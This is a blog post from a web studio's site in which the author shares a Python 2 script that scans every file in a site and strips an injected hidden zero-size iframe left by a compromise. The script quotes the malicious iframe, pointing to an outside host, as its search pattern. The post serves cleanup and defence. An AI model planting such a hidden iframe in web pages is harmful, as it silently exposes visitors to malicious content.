Home arrow Tricks, Tips, and Help arrow Advanced Tips arrow Find exploit and remove it with python regular expressions
Find exploit and remove it with python regular expressions Print E-mail
I had an explot hit a site that wasn't on one of my servers and there wasn't an backup availalbe to resore from. Still having to fix this I decided to write a script to inspect all the files and remove the bad text. Mostly the exploit appended an iframe at the end of files, but I wrote my script to remove particular text no matter where it sat in the file.

I wrote a bit about a python file structure crawler and I'll include my whole method below for reference.


#!/bin/env python
# By Josh White
#This script will start at the current directory and remove the expliot text
#from all of the files in all files and folders


import re
import os
myre = re.compile(r"""<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>""")
log = []
arglist = []
def check(arg,dirname,fnames):
      for file in fnames:
        arg.append(os.path.join(dirname,file))

os.path.walk("./",check, arglist)
for filename in arglist:
  print filename
  if os.path.isfile(filename):
    f = file(filename,"r").read()
    m = myre.search(f)
    if m:
        print "Expliot found in " + filename
        newfile = f[0:m.start()] +  f[m.end():len(f)]
        file(filename,"w").write(newfile)
        log.append(filename + " was repaired")

file("PYLOG.log","w").writelines(log)
 

Basically I compile the bad text as a regular expression, then iterate through every file and search for a match. If a match is found I replace the bad file with the file - bad text. I know this will only find the first instance of the bad text and remove it and if there were more instances in a single file they wouldn't be found. You could make the if myre.search into a recursive function, or just run the script multiple times!
 
 
< Prev   Next >
[ Back ]

Jibwa Work Samples

Contact Jibwa LLC

Under Construction

Jibwa.com is under construction. Watch out for broken links, missing pages, potholes and bulldozers. We apologize for the temporary inconvenience - Jibwa.com Staff

News and Updates

Flex 4 Pediatrics One

Recently Jibwa LCC published demonstration videos and a new website design for Pediatrics One Clinical Management software built on Flex Flash Builder...
Read More ...

Eclectic Flea Simple Business Site

Using hand written materials and some photos we managed to create a simple site for Tucson's artsy thrift store. The Eclectic Flea ...
Read More ...

Flash Builder 2 Release changes from beta

I am moving from (flex) Flash Builder Beta 2 to Flash Builder Release Stable and keeping notes on changes I've had to make to my code. 1.) mx names...
Read More ...

Radiology Gallery

Jibwa and Tripwirearts have built and  launched a new website with Dr Benjamin Strong. radiologygallery.com for radiology continuing medical educ...
Read More ...